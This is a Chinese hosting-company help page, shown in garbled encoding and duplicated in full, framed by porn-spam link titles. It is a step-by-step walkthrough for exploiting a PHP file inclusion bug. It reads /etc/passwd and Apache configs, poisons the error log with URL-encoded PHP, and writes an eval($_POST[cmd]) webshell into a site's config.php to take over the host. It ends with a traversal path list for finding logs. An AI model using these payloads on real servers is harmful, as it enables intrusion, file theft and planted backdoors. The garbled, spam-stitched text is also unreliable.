九色成人免费视频_久久一区视频_视频一区国产精品_精品视频在线观看

始創(chuàng)于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊(cè)有禮 登錄
  • 掛牌上市企業(yè)
  • 60秒人工響應(yīng)
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補(bǔ)償
全部產(chǎn)品
您的位置: 網(wǎng)站首頁(yè) > 幫助中心>文章內(nèi)容

黑客滲透linux下載備份取shell

發(fā)布時(shí)間:  2012/8/15 17:52:35

關(guān)于php包含Apache日志的利用,其實(shí)也就是利用提交的網(wǎng)址里有php語(yǔ)句,然后再被Apache服務(wù)器的日志記錄,然后php再去包含執(zhí)行,從而包含了去執(zhí)行。當(dāng)然,這種辦法最大的弊端是Apache日志肯定會(huì)過(guò)大,回應(yīng)的時(shí)候當(dāng)然會(huì)超時(shí)什么的,所以也是受條件限制的。全當(dāng)一種研究算了。下面是我的測(cè)試過(guò)程,我覺(jué)得很有意思,你也看看。
比如說(shuō),在一個(gè)php存在包含漏洞就像這樣,存在一句php包含漏洞的語(yǔ)句
以下是引用片段:
<? include($zizzy); ?>   //包含變量$zizzy


你可以
http://xxx.com/z.php?zizzy=/etc/inetd.conf
http://xxx.com/z.php?zizzy=/proc/cpuinfo
http://xxx.com/z.php?zizzy=/etc/passwd

就可以利用包含語(yǔ)句來(lái)查看一些系統(tǒng)環(huán)境和密碼檔文件。

那么關(guān)于日志包含下面我們來(lái)看:
比如我們的Apache的服務(wù)器配置文件位置在這里
/usr/local/apache/conf/httpd.conf
那么我們來(lái)包含一下httpd.conf,來(lái)看下路徑信息什么的
http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf

讀出Apache的配置信息,這里列出部分信息。
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
</VirtualHost>

而我們提交http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
就可以讀出Apache的錯(cuò)誤日志記錄

[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
exist: /home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
exist: /home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
exist: /home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/kkkkkkkk

而數(shù)據(jù)日志/home/virtual/www.xxx.com/logs/www-access_log也是一樣的,一樣可以讀出來(lái),只不過(guò)文件會(huì)很大,那也沒(méi)意思測(cè)試下去了,那怎么利用呢。

比如我們提交要提交這句,<?phpinfo();?> //查看php的相關(guān)信息
在這里,我們只能提交URL編碼模式,因?yàn)槲以跍y(cè)試中發(fā)現(xiàn),<?的標(biāo)記并不被記錄,只有轉(zhuǎn)換成URL編碼提交才會(huì)被完整記錄。

在這里%3C%3Fphpinfo%28%29%3B%3F%3E這句就是轉(zhuǎn)換過(guò)了的<?phpinfo();?>,我們提交
http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E

這樣肯定會(huì)報(bào)出錯(cuò)找不到頁(yè)面,而一出錯(cuò)就被記在錯(cuò)誤日志里了
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
這樣這個(gè)日志文件就被包含成了phpinfo的信息,而回顯也就成了一個(gè)顯示php信息的頁(yè)面。


如果可以的話(能夠執(zhí)行系統(tǒng)命令,也就是safe_mode開(kāi)著的時(shí)候),
這樣子也不錯(cuò),
<?system("ls+-la+/home");?>   //執(zhí)行命令列出home下的文件列表,記得轉(zhuǎn)換為URL格式哦。

/home/
total 9
-rw-r--r--   1 www.xxx.com   silver       55 Jan 20 23:01 about.php
drwxrwxrwx   4 www.xxx.com   silver     4096 Jan 21 06:07 abc
-rw-r--r--   1 www.xxx.com   silver     1438 Dec 3 07:39 index.php
-rwxrwxrwx   1 www.xxx.com   silver     5709 Jan 21 20:05 show.php  
-rw-r--r--   1 www.xxx.com   silver     5936 Jan 18 01:37 admin.php
-rwxrwxrwx   1 www.xxx.com   silver     5183 Jan 18 15:30 config.php3
-rw-rw-rw-   1 www.xxx.com   silver   102229 Jan 21 23:18 info.txt
drwxr-xr-x   2 www.xxx.com   silver     4096 Jan 8 16:03 backup
-rw-r--r--   1 www.xxx.com   silver     7024 Dec 4 03:07 test.php

這樣就列出了home下的文件
或者直接一句話木馬<?eval($_POST[cmd]);?>,
這樣轉(zhuǎn)換后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 這樣的格式。
我們提交
http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E

因?yàn)樯厦婺莻(gè)很不實(shí)際,我在測(cè)試中發(fā)現(xiàn)日志動(dòng)不動(dòng)就是幾十兆,那樣玩起來(lái)也沒(méi)意思了。下面想的再深入一點(diǎn)也就是我們寫入一個(gè)很實(shí)際的webshell來(lái)用,也比上面那種慢的要死好很多。

比如還是這句一句話木馬
<?eval($_POST[cmd]);?>  

到這里你也許就想到了,這是個(gè)很不錯(cuò)的辦法。接著看,如何寫入就成了個(gè)問(wèn)題,用這句,
fopen打開(kāi)/home/virtual/www.xxx.com/forum/config.php這個(gè)文件,然后寫入<?eval($_POST[cmd]);?>這個(gè)一句話木馬服務(wù)端語(yǔ)句。連起來(lái)表達(dá)成php語(yǔ)句就是

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   //在config.php里寫入一句木馬語(yǔ)句

我們提交這句,再讓Apache記錄到錯(cuò)誤日志里,再包含就成功寫入shell,記得一定要轉(zhuǎn)換成URL格式才成功。
轉(zhuǎn)換為
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我們提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

這樣就錯(cuò)誤日志里就記錄下了這行寫入webshell的代碼。
我們?cè)賮?lái)包含日志,提交
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

這樣webshell就寫入成功了,config.php里就寫入一句木馬語(yǔ)句
OK.
http://www.xxx.com/forum/config.php這個(gè)就成了我們的webshell
直接用lanker的客戶端一連,主機(jī)就是你的了。

PS:上面講的,前提是文件夾權(quán)限必須可寫 ,一定要-rwxrwxrwx(777)才能繼續(xù),這里直接用上面列出的目錄來(lái)查看。上面講的都是在知道日志路徑的情況下的利用

其他的日志路徑,你可以去猜,也可以參照這里。
附:收集的一些日志路徑
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log     
/var/log/httpd/error_log    
../apache/logs/error.log    
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log

關(guān)于php包含Apache日志的利用,其實(shí)也就是利用提交的網(wǎng)址里有php語(yǔ)句,然后再被Apache服務(wù)器的日志記錄,然后php再去包含執(zhí)行,從而包含了去執(zhí)行。當(dāng)然,這種辦法最大的弊端是Apache日志肯定會(huì)過(guò)大,回應(yīng)的時(shí)候當(dāng)然會(huì)超時(shí)什么的,所以也是受條件限制的。全當(dāng)一種研究算了。下面是我的測(cè)試過(guò)程,我覺(jué)得很有意思,你也看看。
比如說(shuō),在一個(gè)php存在包含漏洞就像這樣,存在一句php包含漏洞的語(yǔ)句
以下是引用片段:
<? include($zizzy); ?>   //包含變量$zizzy


你可以
http://xxx.com/z.php?zizzy=/etc/inetd.conf
http://xxx.com/z.php?zizzy=/proc/cpuinfo
http://xxx.com/z.php?zizzy=/etc/passwd

就可以利用包含語(yǔ)句來(lái)查看一些系統(tǒng)環(huán)境和密碼檔文件。

那么關(guān)于日志包含下面我們來(lái)看:
比如我們的Apache的服務(wù)器配置文件位置在這里
/usr/local/apache/conf/httpd.conf
那么我們來(lái)包含一下httpd.conf,來(lái)看下路徑信息什么的
http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf

讀出Apache的配置信息,這里列出部分信息。
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
</VirtualHost>

而我們提交http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
就可以讀出Apache的錯(cuò)誤日志記錄

[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
exist: /home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
exist: /home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
exist: /home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/kkkkkkkk

而數(shù)據(jù)日志/home/virtual/www.xxx.com/logs/www-access_log也是一樣的,一樣可以讀出來(lái),只不過(guò)文件會(huì)很大,那也沒(méi)意思測(cè)試下去了,那怎么利用呢。

比如我們提交要提交這句,<?phpinfo();?> //查看php的相關(guān)信息
在這里,我們只能提交URL編碼模式,因?yàn)槲以跍y(cè)試中發(fā)現(xiàn),<?的標(biāo)記并不被記錄,只有轉(zhuǎn)換成URL編碼提交才會(huì)被完整記錄。

在這里%3C%3Fphpinfo%28%29%3B%3F%3E這句就是轉(zhuǎn)換過(guò)了的<?phpinfo();?>,我們提交
http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E

這樣肯定會(huì)報(bào)出錯(cuò)找不到頁(yè)面,而一出錯(cuò)就被記在錯(cuò)誤日志里了
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
這樣這個(gè)日志文件就被包含成了phpinfo的信息,而回顯也就成了一個(gè)顯示php信息的頁(yè)面。


如果可以的話(能夠執(zhí)行系統(tǒng)命令,也就是safe_mode開(kāi)著的時(shí)候),
這樣子也不錯(cuò),
<?system("ls+-la+/home");?>   //執(zhí)行命令列出home下的文件列表,記得轉(zhuǎn)換為URL格式哦。

/home/
total 9
-rw-r--r--   1 www.xxx.com   silver       55 Jan 20 23:01 about.php
drwxrwxrwx   4 www.xxx.com   silver     4096 Jan 21 06:07 abc
-rw-r--r--   1 www.xxx.com   silver     1438 Dec 3 07:39 index.php
-rwxrwxrwx   1 www.xxx.com   silver     5709 Jan 21 20:05 show.php  
-rw-r--r--   1 www.xxx.com   silver     5936 Jan 18 01:37 admin.php
-rwxrwxrwx   1 www.xxx.com   silver     5183 Jan 18 15:30 config.php3
-rw-rw-rw-   1 www.xxx.com   silver   102229 Jan 21 23:18 info.txt
drwxr-xr-x   2 www.xxx.com   silver     4096 Jan 8 16:03 backup
-rw-r--r--   1 www.xxx.com   silver     7024 Dec 4 03:07 test.php

這樣就列出了home下的文件
或者直接一句話木馬<?eval($_POST[cmd]);?>,
這樣轉(zhuǎn)換后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 這樣的格式。
我們提交
http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E

因?yàn)樯厦婺莻(gè)很不實(shí)際,我在測(cè)試中發(fā)現(xiàn)日志動(dòng)不動(dòng)就是幾十兆,那樣玩起來(lái)也沒(méi)意思了。下面想的再深入一點(diǎn)也就是我們寫入一個(gè)很實(shí)際的webshell來(lái)用,也比上面那種慢的要死好很多。

比如還是這句一句話木馬
<?eval($_POST[cmd]);?>  

到這里你也許就想到了,這是個(gè)很不錯(cuò)的辦法。接著看,如何寫入就成了個(gè)問(wèn)題,用這句,
fopen打開(kāi)/home/virtual/www.xxx.com/forum/config.php這個(gè)文件,然后寫入<?eval($_POST[cmd]);?>這個(gè)一句話木馬服務(wù)端語(yǔ)句。連起來(lái)表達(dá)成php語(yǔ)句就是

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   //在config.php里寫入一句木馬語(yǔ)句

我們提交這句,再讓Apache記錄到錯(cuò)誤日志里,再包含就成功寫入shell,記得一定要轉(zhuǎn)換成URL格式才成功。
轉(zhuǎn)換為
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我們提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

這樣就錯(cuò)誤日志里就記錄下了這行寫入webshell的代碼。
我們?cè)賮?lái)包含日志,提交
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

這樣webshell就寫入成功了,config.php里就寫入一句木馬語(yǔ)句
OK.
http://www.xxx.com/forum/config.php這個(gè)就成了我們的webshell
直接用lanker的客戶端一連,主機(jī)就是你的了。

PS:上面講的,前提是文件夾權(quán)限必須可寫 ,一定要-rwxrwxrwx(777)才能繼續(xù),這里直接用上面列出的目錄來(lái)查看。上面講的都是在知道日志路徑的情況下的利用

其他的日志路徑,你可以去猜,也可以參照這里。
附:收集的一些日志路徑
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log     
/var/log/httpd/error_log    
../apache/logs/error.log    
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log

億恩科技地址(ADD):鄭州市黃河路129號(hào)天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
   聯(lián)系:億恩小凡
   QQ:89317007
   電話:0371-63322206


本文出自:億恩科技【www.23lll.com】

服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經(jīng)營(yíng)性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經(jīng)營(yíng)性ICP/ISP/IDC證:豫B1.B2-20060070
  • 億恩南昌公司:
  • 經(jīng)營(yíng)性ICP/ISP證:贛B2-20080012
  • 服務(wù)器/云主機(jī) 24小時(shí)售后服務(wù)電話:0371-60135900
  • 虛擬主機(jī)/智能建站 24小時(shí)售后服務(wù)電話:0371-60135900
  • 專注服務(wù)器托管17年
    掃掃關(guān)注-微信公眾號(hào)
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權(quán)所有  地址:鄭州市高新區(qū)翠竹街1號(hào)總部企業(yè)基地億恩大廈  法律顧問(wèn):河南亞太人律師事務(wù)所郝建鋒、杜慧月律師   京公網(wǎng)安備41019702002023號(hào)
      0
     
     
     
     

    0371-60135900
    7*24小時(shí)客服服務(wù)熱線

     
     
    九色成人免费视频_久久一区视频_视频一区国产精品_精品视频在线观看
    亚洲永久免费av| 欧美激情一区二区三区四区| 亚洲国内自拍| 亚洲欧美综合网| 亚洲一区二区三区中文字幕在线 | 亚洲一区bb| 一区二区三区视频观看| 日韩视频一区二区三区在线播放 | 99国产成+人+综合+亚洲欧美| 91久久在线播放| 亚洲黄色av| 亚洲精一区二区三区| 亚洲精品日韩一| 亚洲美女色禁图| 一本色道久久99精品综合| 亚洲麻豆国产自偷在线| 日韩亚洲精品视频| 日韩亚洲欧美在线观看| 一区二区三区精品国产| 亚洲一区高清| 午夜在线精品偷拍| 久久高清免费观看| 麻豆精品视频在线观看| 欧美福利网址| 欧美日韩国语| 国产精品免费看片| 国产日韩欧美制服另类| 激情久久久久久久| 亚洲国产女人aaa毛片在线| 91久久精品网| 一本色道久久| 亚洲欧美久久久久一区二区三区| 欧美一区二区视频在线观看| 亚洲第一久久影院| 99国产精品| 性色av香蕉一区二区| 久久免费视频网站| 欧美精品久久久久久久久久| 欧美午夜片欧美片在线观看| 国产精品尤物| 亚洲福利在线观看| 一区二区三区日韩欧美| 羞羞视频在线观看欧美| 久久gogo国模裸体人体| 日韩一级在线观看| 午夜久久久久久久久久一区二区| 欧美在线视频一区二区三区| 裸体歌舞表演一区二区| 欧美日韩精品久久久| 国产日产高清欧美一区二区三区| 精品1区2区| 一本在线高清不卡dvd| 午夜精品免费在线| 亚洲日本无吗高清不卡| 亚洲在线免费| 两个人的视频www国产精品| 欧美日韩系列| 国际精品欧美精品| 9人人澡人人爽人人精品| 欧美在线啊v| 在线视频免费在线观看一区二区| 久久激情综合网| 欧美乱妇高清无乱码| 国产亚洲欧洲| 一区二区毛片| 亚洲片区在线| 欧美一区二区三区在线免费观看| 免费看黄裸体一级大秀欧美| 国产精品毛片a∨一区二区三区| 韩国久久久久| 亚洲综合色网站| 99精品热视频| 久久一区国产| 国产精品资源在线观看| 最新成人在线| 久久精品国产在热久久| 亚洲自拍偷拍视频| 欧美精品播放| 在线观看视频免费一区二区三区| 亚洲自拍高清| 中文国产成人精品久久一| 久久精品国产免费观看| 欧美日韩综合久久| 亚洲国产毛片完整版| 欧美一区二区三区免费大片| 亚洲一区二区在线看| 欧美—级在线免费片| 激情久久五月天| 香蕉久久夜色精品| 午夜欧美大尺度福利影院在线看| 欧美二区在线播放| 伊人婷婷欧美激情| 欧美一区二区三区男人的天堂| 亚洲主播在线播放| 欧美日韩精品一区二区三区| 精品9999| 久久精品一本久久99精品| 欧美在线免费播放| 国产精品日韩专区| 99re6这里只有精品| 亚洲精品免费一二三区| 久久综合狠狠综合久久激情| 国产一区自拍视频| 午夜在线观看免费一区| 午夜精品电影| 国产精品第13页| 一本色道久久综合一区| 一区二区三区蜜桃网| 欧美女激情福利| 91久久精品美女| 日韩视频不卡| 欧美激情影音先锋| 亚洲精品女av网站| 999在线观看精品免费不卡网站| 欧美xxxx在线观看| **欧美日韩vr在线| 亚洲精品免费一二三区| 欧美福利视频| 亚洲精品日韩在线| 在线视频精品| 欧美日韩综合一区| 一区二区三区四区五区精品视频 | 久久久久久噜噜噜久久久精品| 国产精品视频xxx| 亚洲视屏在线播放| 性做久久久久久久久| 国产美女精品在线| 欧美在线观看www| 久久一区二区三区av| 亚洲第一黄网| av不卡在线观看| 欧美视频一区在线| 亚洲视频在线免费观看| 欧美一区二区三区视频免费| 国产日本欧洲亚洲| 久久国产视频网| 欧美xxx成人| 亚洲精品在线观看视频| 亚洲一区二区三区中文字幕| 国产精品美女| 欧美在线二区| 欧美韩日一区| 一区二区三区 在线观看视| 亚洲综合日韩在线| 国产一区二区三区成人欧美日韩在线观看 | 欧美成人一区二区三区片免费| 亚洲国产影院| 在线亚洲欧美| 国产精品一区二区黑丝| 久久国产精品99国产精| 欧美国产乱视频| 亚洲一区二区久久| 久久免费午夜影院| 亚洲免费电影在线| 午夜视频一区二区| 黄色av一区| 亚洲图片欧洲图片av| 国产欧美一区二区三区沐欲| 亚洲精品123区| 欧美视频精品在线| 午夜亚洲精品| 欧美激情一区二区| 亚洲欧美日韩国产综合在线| 久久一区二区三区国产精品| 亚洲理论电影网| 久久精品国产一区二区三| 亚洲国产专区校园欧美| 亚洲女性裸体视频| 尹人成人综合网| 亚洲女爱视频在线| 亚洲缚视频在线观看| 先锋影院在线亚洲| 亚洲国产精品久久| 久久国产精品一区二区三区| 亚洲区免费影片| 久久精品国产免费观看| 日韩视频精品| 久久美女艺术照精彩视频福利播放| 最新成人av网站| 久久国产精品毛片| 99国产成+人+综合+亚洲欧美| 久久精品日韩| 一区二区三区高清在线| 久热精品视频在线观看| 亚洲视频一区二区| 欧美激情精品久久久久久黑人 | 狠狠色丁香婷婷综合| 亚洲影院污污.| 1000部精品久久久久久久久| 午夜欧美视频| 日韩午夜电影在线观看| 美国十次成人| 亚洲欧美国产77777| 欧美精品在线看| 亚洲大胆在线| 国产日韩高清一区二区三区在线| 一本在线高清不卡dvd| 精品999在线观看| 欧美专区福利在线| 亚洲图片欧美一区|